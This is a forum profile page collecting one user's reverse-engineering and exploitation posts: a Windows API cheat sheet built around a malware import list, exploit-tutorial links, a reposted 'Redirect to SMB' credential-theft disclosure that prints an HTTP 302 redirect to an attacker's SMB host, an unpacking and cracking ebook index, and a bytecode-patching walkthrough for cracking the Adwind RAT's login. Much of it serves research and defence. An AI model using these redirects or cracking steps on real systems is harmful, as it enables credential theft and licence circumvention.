-
Posts
63 -
Joined
-
Last visited
-
Days Won
11
Everything posted by NO-MERCY
-
The Windows API for Hackers and Reverse Engineers The Windows API is one of the “must know” areas for most reverse engineers and exploit writers. It’s an area than the more I use the APIs the more that I find myself looking up speific APIs and wishing that I would have known what I know now about these sometimes vague and/or mysterious functions. Why should someone who’s in the INFOSEC community care about these APIs? Well to put it shortly, they can make your life considerably easier. If you do incident response, are just getting starting writing exploits, or anything related, then you’ve likely seen these APIs mentioned before. They’re a crucial part of everything from shellcode design to malware analysis. One of the most common places you’ll run into these APIs is in malware analysis. The Windows APIs are crucial to nearly every piece of software that runs on Windows. Without these APIs malware authors would be left writing a considerable amount more code, which few malware authors want to do. Knowing that these are going to be the malware’s link to Windows itself, just examining the APIs can give you great clues about what the malware is trying to do. (Note: malware authors could statically compile their code, which would not need to import the APIs, this is not common and would leave the malware sample significantly larger) There are endless tools which will show you which APIs are being imported. Some of the most common tools are OllyDbg, Immunity Debugger, IDA Pro, MASTIFF, and countless other tools and scripts. Let’s take a look at a malware sample’s imports. kernel32.dll DeleteCriticalSection 0x4090dc kernel32.dll LeaveCriticalSection 0x4090e0 kernel32.dll EnterCriticalSection 0x4090e4 kernel32.dll VirtualFree 0x4090e8 kernel32.dll LocalFree 0x4090ec kernel32.dll GetCurrentThreadId 0x4090f0 kernel32.dll GetStartupInfoA 0x4090f4 kernel32.dll GetCommandLineA 0x4090f8 kernel32.dll FreeLibrary 0x4090fc kernel32.dll ExitProcess 0x409100 kernel32.dll WriteFile 0x409104 kernel32.dll UnhandledExceptionFilter 0x409108 kernel32.dll RtlUnwind 0x40910c kernel32.dll RaiseException 0x409110 kernel32.dll GetStdHandle 0x409114 user32.dll GetKeyboardType 0x40911c user32.dll MessageBoxA 0x409120 advapi32.dll RegQueryValueExA 0x409128 advapi32.dll RegOpenKeyExA 0x40912c advapi32.dll RegCloseKey 0x409130 kernel32.dll TlsSetValue 0x409138 kernel32.dll TlsGetValue 0x40913c kernel32.dll TlsFree 0x409140 kernel32.dll TlsAlloc 0x409144 kernel32.dll LocalFree 0x409148 kernel32.dll LocalAlloc 0x40914c wsock32.dll closesocket 0x409154 wsock32.dll WSACleanup 0x409158 wsock32.dll recv 0x40915c wsock32.dll send 0x409160 wsock32.dll connect 0x409164 wsock32.dll htons 0x409168 wsock32.dll socket 0x40916c wsock32.dll WSAStartup 0x409170 wsock32.dll gethostbyname 0x409174 advapi32.dll RegSetValueExA 0x40917c advapi32.dll RegCreateKeyA 0x409180 advapi32.dll RegCloseKey 0x409184 advapi32.dll AdjustTokenPrivileges 0x409188 advapi32.dll LookupPrivilegeValueA 0x40918c advapi32.dll OpenProcessToken 0x409190 user32.dll GetForegroundWindow 0x409198 user32.dll wvsprintfA 0x40919c kernel32.dll CloseHandle 0x4091a4 kernel32.dll RtlMoveMemory 0x4091a8 kernel32.dll RtlZeroMemory 0x4091ac kernel32.dll WriteProcessMemory 0x4091b0 kernel32.dll ReadProcessMemory 0x4091b4 kernel32.dll VirtualProtect 0x4091b8 kernel32.dll Sleep 0x4091bc kernel32.dll GetTickCount 0x4091c0 kernel32.dll MoveFileExA 0x4091c4 kernel32.dll ReadFile 0x4091c8 kernel32.dll WriteFile 0x4091cc kernel32.dll SetFilePointer 0x4091d0 kernel32.dll FindClose 0x4091d4 kernel32.dll FindFirstFileA 0x4091d8 kernel32.dll DeleteFileA 0x4091dc kernel32.dll CreateFileA 0x4091e0 kernel32.dll GetPrivateProfileIntA 0x4091e4 kernel32.dll GetPrivateProfileStringA 0x4091e8 kernel32.dll WritePrivateProfileStringA 0x4091ec kernel32.dll SetFileAttributesA 0x4091f0 kernel32.dll GetCurrentProcessId 0x4091f4 kernel32.dll GetCurrentProcess 0x4091f8 kernel32.dll Process32Next 0x4091fc kernel32.dll Process32First 0x409200 kernel32.dll Module32Next 0x409204 kernel32.dll Module32First 0x409208 kernel32.dll CreateToolhelp32Snapshot 0x40920c kernel32.dll WinExec 0x409210 kernel32.dll lstrcpyA 0x409214 kernel32.dll lstrcatA 0x409218 kernel32.dll lstrcmpiA 0x40921c kernel32.dll lstrcmpA 0x409220 kernel32.dll lstrlenA 0x409224 kernel32.dll lstrlenA 0x40922c kernel32.dll lstrcpyA 0x409230 kernel32.dll lstrcmpiA 0x409234 kernel32.dll lstrcmpA 0x409238 kernel32.dll lstrcatA 0x40923c kernel32.dll WriteProcessMemory 0x409240 kernel32.dll VirtualProtect 0x409244 kernel32.dll TerminateThread 0x409248 kernel32.dll TerminateProcess 0x40924c kernel32.dll Sleep 0x409250 kernel32.dll OpenProcess 0x409254 kernel32.dll GetWindowsDirectoryA 0x409258 kernel32.dll GetTickCount 0x40925c kernel32.dll GetSystemDirectoryA 0x409260 kernel32.dll GetModuleHandleA 0x409264 kernel32.dll GetCurrentProcessId 0x409268 kernel32.dll GetCurrentProcess 0x40926c kernel32.dll GetComputerNameA 0x409270 kernel32.dll ExitProcess 0x409274 kernel32.dll CreateThread 0x409278 user32.dll wvsprintfA 0x409280 user32.dll UnhookWindowsHookEx 0x409284 user32.dll SetWindowsHookExA 0x409288 user32.dll GetWindowThreadProcessId 0x40928c user32.dll GetWindowTextA 0x409290 user32.dll GetForegroundWindow 0x409294 user32.dll GetClassNameA 0x409298 user32.dll CallNextHookEx 0x40929c Looking over these imported API functions may at first seem useless to the untrained analyst. However, if you begin to dissect what some of the APIs can be used for you can begin to make assumptions about the function of this malware. For example GetTickCount is a very common API for detecting debuggers. AdjustTokenPrivileges and LookupPrivilegeValueA are both commonly used in accessing the Windows security tokens. RegSetValueExA, RegCreateKeyA, and RegCloseKey are used when accessing and altering a registry key. Taking just these APIs into consideration you could begin to make some interesting hypothesis about the capabilities of this specific sample. I’ve noticed that analysts who don’t totally understand these API function will typically ignore them. For that fact I’m creating a “cheat sheet” for the Windows API functions. The “pre-final” release is attached below. Please don’t forget that Microsoft did not build these APIs for malicious use and are very commonly used by Windows programmers (unless it’s an undocumented API). Thus analyzing just the imported APIs may not tell you if a sample is malicious or not (but is very useful if you already know a sample is malicious). Over the past month I’ve also been working on analyzing what is now over 5TB of malware to gather the most frequently used Windows APIs. This data will likely continue to process for close to another month. Once this is done I’ll work on completing this cheat sheet based on those findings and write another post about my discoveries. Keeping that in mind this list is not final and if you have any feedback, comments, questions, or recommendations please make them! In the course of developing the current list I used multiple resources, I’d just like to highlight a few. These are also great resources if you’re looking to learn more. Resources: Practical Malware Analysis – great book on reverse engineering malware MSDN – where to go if you’re curious about a specific Windows API Windows PE File Details – Great article that describes the fundamentals of the PE file and more details surrounding PE file imports Cheat Sheet Version .5 : Download Source : https://www.bnxnet.com/windows-api-for-hackers/
-
- apis
- kernel32.dll
-
(and 3 more)
Tagged with:
-
Cum dezvolti un exploit
NO-MERCY replied to neox's topic in Reverse engineering & exploit development
Part Number 5 : Source : https://rstforums.com/forum/80249-cum-dezvolti-un-exploit-05-a.rst HOPE TO CONTINUE THIS AMAZING Primer -> NEOX -
Reverse engineer for beginners
NO-MERCY replied to ICEBREAKER101010's topic in Reverse engineering & exploit development
18-08-2014 By : Nytro https://rstforums.com/forum/88452-reverse-engineering-beginners-free-book.rst?highlight=Reverse+Engineering+Beginners- 3 replies
-
- engineeringincepatori
- funk
-
(and 3 more)
Tagged with:
-
Hello RST : Advanced Heap Overflow Exploitation By Francois Goichon, 28 Jan. 2015 For 15 years, heap exploitation has gone through a relentless cycle of the disclosure of technical exploitation techniques and consequent hardening of malloc() in response. Notable examples include: the old-school unlink() exploit; the Malloc Maleficarum revisited in 2009; and Google Project Zero's large chunks unlink, where libc fails to compile assert() statements in. Inevitably, most of the techniques described in these papers are now obsolete, have been subsequently patched, or have been rendered unexploitable through the addition of mitigation technologies such as Address Space Layout Randomisation (ASLR) and No eXecute (NX). Nowadays, exploiting heap structures is heavily dependent on the target application, and in most scenarios the goal is to overwrite pointers or indexes that can eventually provide program counter (PC) control or an arbitrary overwrite. In this paper, however, we target a more specific scenario, where the heap overflow cannot immediately reach interesting data. We present how heap structures can be abused to produce overlapping chunks. The exploitation process is then comparable to use-after-free vulnerabilities. We demonstrate this scenario in both a real-world example and a proof-of-concept program prone to overflows in heap areas where the attacker can predict and further manage chunk allocation. This happens in programs that make an extensive use of malloc() and free() with user-controlled chunks, namely protocol handlers, parsers, editors or, more generally, applications maintaining algorithmic structures of said user-supplied data. Read the full whitepaper Source : Advanced Heap Overflow Exploitation Regards NO-MERCY
- 1 reply
-
- 1
-
SPEAR - Redirect to SMB April 13, 2015 By Brian Wallace We’ve uncovered a new technique for stealing sensitive login credentials from any Windows PC, tablet or server, including ones running previews of the yet-to-be-released Windows 10 operating system. Software from at least 31 companies including Adobe, Apple, Box, Microsoft, Oracle and Symantec can be exploited using this vulnerability, which we have dubbed Redirect to SMB. Carnegie Mellon University CERT disclosed the vulnerability to the public today (#VU672268), following six weeks of working with vendors to help them mitigate the issue. Redirect to SMB is a way for attackers to steal valuable user credentials by hijacking communications with legitimate web servers via man-in-the-middle attacks, then sending them to malicious SMB (server message block) servers that force them to spit out the victim’s username, domain and hashed password. We are publishing a white paper that describes the issue in detail, and offers mitigation methods for both developers and computer users. For technical details, download the Redirect To SMB white paper. Original Attack The Redirect to SMB attack builds on a vulnerability discovered in 1997 by Aaron Spangler, who found that supplying URLs beginning with the word “file” (such as file://1.1.1.1/) to Internet Explorer would cause the operating system to attempt to authenticate with a SMB server at the IP address 1.1.1.1. It’s a serious issue because stolen credentials can be used to break into private accounts, steal data, take control of PCs and establish a beachhead for moving deeper into a targeted network. These “file” URLs could be provided as an image, iframe, or any other web resource resolved by the browser. We uncovered Redirect to SMB while hunting for ways to abuse a chat client feature that provides image previews. When a URL to an image was received, the client attempted to show a preview of the image. Inspired by Aaron’s research some 18 years ago, we promptly sent another user a URL starting with file:// which pointed to a malicious SMB server. Surely enough, the chat client tried to load the image, and the Windows user at the other end attempted to authenticate with our SMB server. RedirectToSMB-Diagram-1 While conducting previous research on network protocols, we had experimented with redirecting ordinary HTTP requests to web servers to identify new attacks. So we were curious to see what threats SMB posed when combined with redirects. We created an HTTP server in Python that answered every request with a simple HTTP 302 status code to redirect clients to a file:// URL, and using that we were able to confirm that an http:// URL could lead to an authentication attempt from the OS. GET / HTTP/1.1 Accept: text/html, application/xhtml+xml, */* Accept-Language: en-US User-Agent: Mozilla/5.0,( Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko Accept-Endoding: gzip, deflate Host: 192.168.36.207 DNT: 1 Connection: Keep-Alive HTTP/1.1 302 Found Content-Type: text/html Location: file://192.168.36.207/mitmproxy-identifier Content-Length: 0 RedirectToSMB-Diagram-02 Increased Attack Surface We identified four commonly used Windows API functions that allow for redirection from HTTP/HTTPS to SMB. Early testing found that they are used by a wide range of software features such as updaters and usage reporting tools. This discovery opened up a wide range of new attack methods. When combined with a man-in-the-middle attack, an attacker can force authentication attempts with an SMB server using susceptible applications and services that transmit data over HTTP or HTTPS. RedirectToSMB-Diagram-03 Affected Applications We tested dozens of application in our lab, uncovering 31 vulnerable software packages, which we disclosed to CERT at Carnegie Mellon University on Feb. 27, 2015. They include: Widely Used Applications: Adobe Reader, Apple QuickTime and Apple Software Update (which handles the updating for iTunes) Microsoft Applications: Internet Explorer, Windows Media Player, Excel 2010, and even in Microsoft Baseline Security Analyzer Antivirus: Symantec’s Norton Security Scan, AVG Free, BitDefender Free, Comodo Antivirus Security Tools: .NET Reflector, Maltego CE Team Tools: Box Sync, TeamViewer Developer Tools: Github for Windows, PyCharm, IntelliJ IDEA, PHP Storm, JDK 8u31’s installer Impact Redirect to SMB is most likely to be used in targeted attacks by advanced actors because attackers must have control over some component of a victim’s network traffic. Malicious ads could also be crafted that would force authentication attempts from IE users while hiding malicious behavior from those displaying the advertising. Less sophisticated attackers could launch Redirect to SMB attacks on shared WiFi access points at locations such as coffee shops from any computer, including mobile devices. We successfully tested this attack on a home network using a Nexus 7 loaded with all required tools. Examples The following examples show different attacks that could be conducted. In order to effectively demonstrate attack scenarios, the conditions have been simplified. The following are the IP addresses of the computers in the examples: • 192.168.36.207 – The Attacker • 192.168.36.247 – The Victim • 192.168.36.128 – The Router/Internet Gateway The tools in the examples are as follows: • SMBTrap2 • SMBTrap-mitmproxy-inline.py • MITMProxy • Zarp Additional attack examples are discussed in the white paper. Attacking AVG via ARP Poisoning Attacking Microsoft Baseline Security Analyzer via modified DNS record Encrypted Credentials While the user credentials sent over SMB are commonly encrypted, the encryption method used was devised in 1998 and is weak by today’s standards. A stronger hashing algorithm being used on these credentials would decrease the impact of this issue, but not as much as disabling automatic authentication with untrusted SMB servers. With roughly $3,000 worth of GPUs, an attacker could crack any 8-character password consisting of letters (upper and lower case) as well as numbers in less than half a day. Mitigations Microsoft has yet to release a patch to fix the Redirect to SMB vulnerability. The simplest workaround is to block outbound traffic from TCP 139 and TCP 445 -- either at the endpoint firewall or at the network gateway’s firewall (assuming you are on a trusted network). The former will block all SMB communication, which may disable other features that depend on SMB. If the block is done at the network gateway’s firewall, SMB features will still work inside the network, but prevent authentication attempts with destinations outside the network. See the white paper for other mitigation steps. Microsoft did not resolve the issue reported by Aaron Spangler in 1997. We hope that our research will compel Microsoft to reconsider the vulnerabilities and disable authentication with untrusted SMB servers. That would block the attacks identified by Spangler as well as the new Redirect to SMB attack. NO-MERCY Me & i & My self -> lIKE mICROSOFT :) Source ; SPEAR - Redirect to SMB & yOU Can See this Post too ; 18-year-old Unpatched Vulnerability Affects All Versions of Microsoft Windows
-
Hello Rst : This is a little Course for Exploit Development for Win32 talking about stack based bof & seh Contents : Stack-Based Buffer Overflow Tutorials : <--- Part One VLC media player V 0.8.6d (Target) 1-Stack-based Buffer Overflow tutorials : Step 1: Preparing The Skeleton Exploit 2-Stack-based Buffer Overflow tutorials: Step 2 Verifying The Bug 3-Stack-based Buffer Overflow tutorials Step 3: Finding the overwrite offset. Target 4-Stack-based Buffer Overflow tutorials. Step 4 : Picking an overwrite address (JMP ESP: USER32.dll) 5-Stack-based Buffer Overflow tutorials. Step 5: Finding bad characters 6-Stack-based Buffer Overflow tutorials. Step 6 : Adding The Final Shellcode 7-Stack-based Buffer Overflow tutorials. Step 7 : Porting Exploit to Metasploit Framework 8-Stack-based Buffer Overflow tutorials. Step 8: Porting exploit to Metasploit. Seh-Based Buffer Overflow Tutorials : <--- Part Two :) Video Spirit Pro (Target) 9-SEH-based buffer overflow tutorials. Step 1: Skeleton Exploit 10-SEH-based buffer overflow tutorials. Step 2: Finding the Overwrite Offset 11-SEH-based buffer overflow tutorials. Step 3: Picking an overwrite address 12-SEH-based buffer overflow tutorials. Step 4: Finding Bad Characters 13-SEH-based buffer overflow tutorials. Step 5: Adding The Final Shellcode Playlist Youtube : https://www.youtube.com/playlist?list=PLdXylH5WObDcOUUyhoHWUcFImbGNU7nT1 Author : ninjas3c Regards NO-MERCY
-
- 2
-
- based
- development
-
(and 3 more)
Tagged with:
-
Hello Rst : A Brief History of Exploitation Derbycon 4.0 Devin Cook I talked about the history of binary exploitation. It was pretty high-level, but my goal was to let people know that this stuff isn't all that hard, and even though you can't really learn it in school there are definitely plenty of resources available online to teach yourself. Here's the presentation: A Brief History of Exploitation - Derbycon 4.0 | Blog | DevinCook.net Video : Regards
-
Hello RST : Today I'm Finished Pdf For An Excellent Article About Windows Shellcoding Author : Amr Thabet Original Article Link : The Art of Win32 Shellcoding - CodeProject Article Copyright 2012 by AmrThabet Everything else Copyright © CodeProject, 1999-2013 Pdf & Cover By : NO-MERCY Pages : 28 Password : NOPASS CRC32: 74D9A885 MD5: DDA15A98C4AD2683593BE29F456D976C SHA-1: 66D9A72B088D997D811B8AF394B1F693F8810752 All Src's & Pdf Attached In Rar File Download Link : http://www.4shared.com/rar/Rt5VLqC7ce/The_Art_of_Win32_Shellcoding.html Regards NO-MERCY
-
Heartbleed - The Greatest Paper
NO-MERCY posted a topic in Reverse engineering & exploit development
Hello RST .. Yesteday .. While i'm diving in Google i found some one Called : David A. Wheeler he is Write A very very useful book about : Secure Programming for Linux and Unix -> How to ? Wish i could find same in Windows !!! That's great book (2003) --> Old but Gold You can download it as pdf in -> here <- This book provides a set of design and implementation guidelines for writing secure programs for Linux and Unix systems. Such programs include application programs used as viewers of remote data, web applications (including CGI scripts), network servers, and setuid/setgid programs. Specific guidelines for C, C++, Java, Perl, PHP, Python, Tcl, and Ada95 are included. For a current version of the book When i check out his site i'm find alot of amazing articles & papers So .. check it out How to Prevent the next Heartbleed David A. Wheeler 2014-05-28 (originally 2014-04-29) I Called it The Greatest Paper .. it's Really Great Read it from : How to Prevent the next Heartbleed OR : You Can download it as pdf by NO-MERCY --> HERE <-- 38 Pages link 4 Visitors : http://www.4shared.com/office/7aJ1b6cyce/How_to_Prevent_the_next_Heartb.html MD5 : 88C19FC94C522FBD85BE3BFCCDA28462 Regrads NO-MERCY-
- 1
-
Manual Unpacking of UPX using OllyDbg
NO-MERCY replied to Nytro's topic in Reverse engineering & exploit development
Take A look here --> https://rstforums.com/forum/85080-rce-unpacking-e-book.rst -
Hello RST ... RCE Unpacking eBook Converted & Translated from Vietnamese Compressed HTML (.chm) Translate From Vietnamese and Compiled To (.Pdf) bY : Lithium from : Forum.astalavista.ms Brief overview. 1/9/09 Pages : 2342 -> uh oh !!! ====================================================================== ====================================================================== Table Of Contents : ----------------------------- ASProtect 1.23 RC4 - 1.3.08.24 with CloneCD ASProtect_2.x_SKE_inline_patching_tutorial_by_ThunderPwr_trans Amardillo 4.xx-Patching Hardware Fingerprint (HWID) AntiTracks_Arm 4.xx-Code Splicing AoA DVD Ripper Armadillo & Macromedia Games Armadillo 3.70_IAT elimination_Code splicing_Standard Armadillo 4.xx- Code Splicing (Other Method) Armadillo 5.x Dll - Visual.Assist.X.V10.4.1640 Build 2008.05.22 Armadillo DLL – Unpacking and MORE Armadillo Exact Version Location Tutorial Armadillo v3.xx Manual Unpacking Armadillo_tut_serie1 Armadillo_tut_serie1_fixed Armadillo_tut_serie2 Armadillo_tut_serie3 Armadillo_tut_serie4 Armadillo_tut_serie5 Armdillo_tut_serie6 armdillo_tuts_6_exp armdillo_tuts_7 armdillo_tuts_7_exp armdillo_tuts_8 armdillo_tuts_9 Asprotect20beta AutoPlayMediaStudio6_Arm 4.xx - Standard Protection+IAT Elimination Basic Steps to Unpack Bypass Registration EncryptPE V2.2007 Cach khac de defeat debugBlocker Code_Splicing_Evil_Method DOC_Regenerator211_Debug Blocker+ Hardware Finger Print Debugblocker + Nanomites DiaryOne 5.6 ExeCryptor_2.2.x_2.3.x Game Editor 1.3.2 GetRight60beta_Arm 4.xx Full Protections GetRight_5_0_Final_Arm 2.xx-3.xx - Debug Blocker+CopyMem How to unpack AHTeam EP Protector 0.3 How to unpack ASPack 2.12_dqtln How to unpack ASProtect 1.22-1.23 How to unpack ASProtect 1.23 RC4_dqtln How to unpack ASProtect How to unpack AntiCrack Protector 1.0x How to unpack Asprotect 1.23 rc4 series1 How to unpack Asprotect 1.23 rc4 series2 How to unpack FSG v1.33 How to unpack FSGv2.0 How to unpack PELock v1.0x How to unpack PESpin v0.3 How to unpack Petite 2.2 How to unpack exe32packv1.42 HyperSnap-DX_Arm 4.xx - Standard Protection_IAT Elimination_Code Splicing Inline Patching Ap Document to PDF Converter v3 Inline_Patching for UPX InsaneFIDO UnWrapMe Manual Unpacking & cracking MoleBox Pro 2.6 Trial -Volume 1 Manual Unpacking Software Compress 1.2 Manual Unpacking Armadillo 3.78_Crack and reduce size of ASFConverter 2.68 Manual Unpacking Armadillo v4.64 Small Case Manual Unpacking Armadillo v5.42 Case Study Manual Unpacking Armadillo v600 Manual Unpacking EXEcryptor v2.2.6 with target_ PowerArchiver 2007 Manual Unpacking ID Application Protector 1.2 Manual Unpacking NTkrnl_Protector_0.1 Manual Unpacking _Armadillo_Fraps_Code_Splicing_+_IAT_Elimination Manual Unpacking FSG 2.0 Manual Unpacking Petite 2.3 Manual Unpacking Mew 11 SE v1.2 Manual Fixing IAT-NTKRNL Packer Manual Removing Visual Protect 3.5.4 Manual Unpack ACTIVEMARK 5.31 Manual Unpack ActiveMark 5.x Manual Unpack Armadillo v4.62 Manual Unpack ExeStealth Manual Unpack PECompact 1.68-1.84 Manual Unpack PECompact 2.x Manual Unpack PESpinv0.7 tlandn Manual Unpack tElock 0.90 Manual Unpacking CopyMemII DbgBlocker IAT DiaryOne 5.6 Manual Unpacking & Cracking ActiveMark 5.xx Manual Unpacking ExeCryptor 2.2.50 Manual Unpacking MoleBox v2.5.7 and Serial Fishing Manual Unpacking PEQuake v0 Manual Unpacking SVKP 1.32 Tut 1 - ASM Target Manual Unpacking Total Uninstall 3.7 Manual Unpacking Zip Repair Tool 3.2 Manual Unpacking hmimys-Packer 1.0 Manual unpack ASProtect 1.23 RC 4_by hacnho Manual Unpacking EXE Shield v0.5 Manual Unpacking EZIP 1.0 Manual Unpacking FSG 1.0 Manual Unpacking FSG 2.0 modified Manual Unpacking FSG v2.0 Manual Unpacking MEW 11 SE v1.1 Manual Unpacking Mew 10 exe-coder 1.0 Manual Unpacking Morphine 1.4 - 2.7 Manual Unpacking PE Diminisher v0.1 Manual Unpacking PE Lock NT 2.04 Manual Unpacking PE-SHiELD v0.25 Manual Unpacking PECompact 1.84 Manual Unpacking PECompact 2.0 Final Manual Unpacking PECompact v2.38 Manual Unpacking SPLayer 0.08 Manual Unpacking UPX Protector 1.0x Manual Unpacking Virogen Crypt v0.75 Manual Unpacking WWPack32 1.x Manual Unpacking tElock 0.98b1 Manual Unpacking y0da's Crypter v1.2 Movie Collector 4.4_CopyMemII+Nanomites Manual Unpacking Unpack Execryptor 2.x tlandn My Screen Recorder Pro 2 Obsidium 1.2.5.0 - unpacking PictureRipper3_Armadillo 4.xx- Import Elimination+Nanomites ProtectShareware ProtectionPlus 4.x_takada RLPack 1.19 Research Remote System Information 3.2 SWFDecompilerArm 4.xx - Standard Protection SWFText 1.2 SafeDISC2.x Safedisc-Easy or Hard - Vol 1 Safedisc-Easy or Hard - Vol 2 Safedisc-Easy or Hard - Vol 3 SoftWrap 6.1.1_Loader Stupid Execryptor-Fixing Dump Stupid Execryptor-small trick Tag&Rename32rc3_Inline Patching ASProtect 2.2 SKE The Egnima Protector 1.33 Themida_Tutorial 6 Themida_Tutorial1 Themida_Tutorial2 Themida_Tutorial3 Themida_Tutorial4 Themida_Tutorial5 Themida_Tutorial6_exp1 Themida_Tutorial6_exp2 TrojanRemover6.4.4_Trojan Remover-DebugBlocker+Nanomites UNPACKING SLVc0deProtector 1.11 Tut 1_tlandn UNPACKING SLVc0deProtector 1.11 Tut 2_tlandn UnPackMe_Armadillo3.70a.b Unpack PEDiminisher 0.1 Unpack ASPack 2.1 Unpack ASPack 2.12 Unpack ASProtect 1.23 RC4 Unpack Armadillo - Standard protection only_vietnamese Unpack Aspack 1.06b_1.061b Unpack Ezip 1.0 Unpack Mew 10 exe-coder 1.0 Unpack NeoLite2 Unpack PE Pack v1.0 Unpack PECompact 1.68_1.84 Unpack PECompact v1.76 Unpack UnpackMe1_by_KLiZMA Unpack UpX 0.896_1.02 Unpack and Crack Full XP Tools version 4.58 Unpack manual PECompact version 2.55 UnpackMe_CopyMemII_Nanomites Unpack_Armadillo_01 Unpack_Armadillo_02 Unpacking & Cracking RAR Repair Tool 3.0 Unpacking ASProtect 2.3 SKE Unpacking ASProtect 2.XX SKE Unpacking ActiveMark level 2 entry point Unpacking Armadillo 4.xx For Newbie 2 Unpacking EXEcryptor 2.3x Unpacking Flash Recovery 2.35 Unpacking SLVc0deProtector 1.1 Unpacking Unpackme (ASPack + MSLRH) Unpacking Wrapper used by GameHouse.com_tlandn Unwrapping_Reflexive_Arcade_EvilInvasion Upack Armadillo 3.70a_VCT5 Various Asprotect Loader Tricks XTM_Arm 4.xx - Standard Protection+Code Splicing+IAT Elimination Yoda's protectors v1.02[MANUAL UNPACKING] Yoda's protectors v1.03.2 beta3[MANUAL UNPACKING] Yoda's protectors v1.03.2[MANUAL UNPACKING] Yoda's protectors v1.03.3[MANUAL UNPACKING] unpack Asprotect 1.2 unpack PECompact 1.68 – 1.84 unpack PECompact 2.x unpack UPX Scramble RC 1.x unpack Yoda Cryptor 1.2 Download Links : Part 1 : Size 60 MB http://www.4shared.com/rar/-4ImvpF5/rea_unpacking_ebook_-_englishp.html Part 2 : Size 46 MB http://www.4shared.com/rar/41yeKinn/rea_unpacking_ebook_-_englishp.html REGRADS NO-MERCY
-
Hello ... RST Introduction As the title suggestes, this post will feature a practical example of cracking obfuscated Java code, namely Allatori 4.7. For the sake of example I’ve chosen an astonishing Java RAT (Remote ‘Administration’ Tool) worth every of the $100 It got sold for, but I will come back to this later. To start, let’s compare the usual workflow of cracking Java programs and then find out why it won’t work for obfuscated code.The ‘usual’ way to crack Java programs is by decompiling, modifying and recompiling the source code. To understand what this means you need to know that Java source code, unlike e.g. C++, doesn’t get directly translated to low-level machine-code interpreted by the processor. Instead, it gets distributed in a more abstracted code set called java bytecode. This code then gets interpreted by a Java Virtual Machine similar to the .NET Common Language Runtime (CLR) on execution. This offers the ability to distribute programs in a platform independent format (only the VM needs to get adjusted), but as everything, it comes with a downside. Since bytecode has such an abstracted, diverse Instruction set it turns out to be vulnerable to so-called decompiling, which basically means ‘reversing’ the process of compilation by guessing how the original source code might have looked like. Since this is a massive problem of not only application security but also intellectual property there are some efforts to prevent this by obfuscating the code in different ways. One of the results of these efforts is Alatori, a commercial obfuscator starting at $290. It comes with all the features you would except from a commercial obfuscator, most important for us string obfuscation, flow obfuscation and inserting ‘invalid’ bytecode (bytcode ignored by the VM but crashing/confusing known decompilers/deobfuscators). Adwind 3 – Overview Adwind 3 is a Java based RAT supporting not only common desktop operation systems but also Android. It originated from a spain Proof of Concept called Frutas and got recently rebranded and sold as UNRECOM. It’s protected both by a custom login system with serials and hardware identification. Adwind is using the Swing API to draw its GUI. This means that it defines some user input elements (buttons, text boxes, drop downs..) which offer user triggered ‘ActionEvents’ (button click..) and connects them to ActionListenern performing the desired action/method. Our first goal is the ‘Login’ button of the window below. Adwind gets distributed as an executable Java Archive (JAR) containing not only the bytecode in form of .class files corresponding to the different Java classes but also resources like images and sounds and a Manifest file pointing to the main class function (the one which get’s called on execution of the Jar). Manifest-Version: 1.0 Ant-Version: Apache Ant 1.9.1 Created-By: 1.7.0_25-b17 (Oracle Corporation) Class-Path: lib/JTattoo-1.6.9.jar X-COMMENT: Main-Class will be added automatically by build Main-Class: cliente.Login When trying to decompile this main class using JD-GUI, we get just get an ‘// INTERNAL ERROR //‘ instead of the class functions. Of course we could look for a way to fix this, either by hunting down the locations causing them and either patching the decompiler or the class file. But even then, obfuscation techniques like flow obfuscation would result into a source code not really usable. Messing with bytecode Today I want to show you another approach – why going through the whole mess of decompiling and recompiling of we could patch the code directly? There are several bytecode editors to make this easier, my favorite one being dirtyJOE, which is written in C++ and supports python-scripts to perform different manipulations. Since dirtyJOE can’t handle Jars we have to unpack the .class file in question first using any zip-utility. You should really pay attention at this point since zip-archives support case-sensitive filenames (for example cG.class, cg.class), but some operating systems like windows don’t. Since Allatori is utilizing this, it may lead to class files getting overwritten without any notice when unpacking the whole archive to one directory. dirtyJOE welcomes us with some basic information about the class if available, for example it’s parent/super-class, the number of constants (constant_pool_count) and methods. constants are basically all hardcoded references to other functions and strings used by the bytecode. You can find out more about the ClassFile structure here: Bytecode basics | JavaWorld. If we switch to the ‘Methods’-tab, we directly see the main-Method – but before digging into it, we should take a short break – Before using any method of a class we need to initialize it to an object, and so does the JVM. In fact, it even needs to initialize the class. This is happening by invoking (object initialization) and (class initialization). In our case, nothing spectacular is happening in , since the Login class inherits by ‘javax/swing/JFrame’ (User Interface) it initializes the basic Login form and creates the basic form elements: 00000000 : new javax.swing.JComboBox 00000003 : dup 00000004 : invokespecial void javax.swing.JComboBox.() 00000007 : putstatic javax.swing.JComboBox cliente.Login.listalicencias 0000000A : new javax.swing.JPasswordField 0000000D : dup 0000000E : invokespecial void javax.swing.JPasswordField.() 00000011 : putstatic javax.swing.JPasswordField cliente.Login.password 00000014 : new javax.swing.JTextField 00000017 : dup 00000018 : invokespecial void javax.swing.JTextField.() 0000001B : putstatic javax.swing.JTextField cliente.Login.user 0000001E : return To understand what’s going on, you need a basic understanding of the bytecode instruction set and how it gets interpreted. Going through all of this would exceed the scope of this post, and there are people explaining it way better than I could: Bytecode basics | JavaWorld This isn’t the button you’re looking for With the above basics it should be relatively easy to guess what’s going on. Basically, four Swing GUI elements get created, initialized and its references stored in the corresponding fields of the Login-class. javax.swing.JComboBox -> cliente.Login.listalicencias ( drop down list of available licenses) javax.swing.JTextField -> cliente.Login.user (username text-box) javax.swing.JPasswordField -> cliente.Login.password (masked password text-box) But hey! Those aren’t all fields, are they? Where are all those buttons, graphics – where is the Login-button we’re looking for? Let’s check the <init> method: 00000000 : aconst_null 00000001 : aload_0 00000002 : dup 00000003 : dup_x2 00000004 : aload_0 00000005 : invokespecial void javax.swing.JFrame.() 00000008 : invokespecial void cliente.Login.B() 0000000B : invokespecial void cliente.Login.ALLATORI_DEMO() 0000000E : invokevirtual void cliente.Login.setLocationRelativeTo(java.awt.Component) 00000011 : return At first glance, this doesn’t look way better, only a single ‘javax.swing’ is in sight. But let’s take a closer look and figure out what’s going on. If you don’t know the meaning of an instruction, you can look ut up in Oracles JVM Instruction Set Reference First, null gets pushed on the stack (aconst_null). Then aload_0 get’s executed. This loads the first (pos 00) local variable onto the stack, which is always a reference to the object itself, similar to the .this directive in Java.The top value of the stack gets duplicated (dup) and the new top-value gets duplicated two values down the stack. Finally, the object reference get’s loaded another time. At this point, the stack should look like this: this, this, this, this, null You could theoretically get the same result by doing 1 aconst_0 and four aload_0 s, but that would be way to simple! Those this 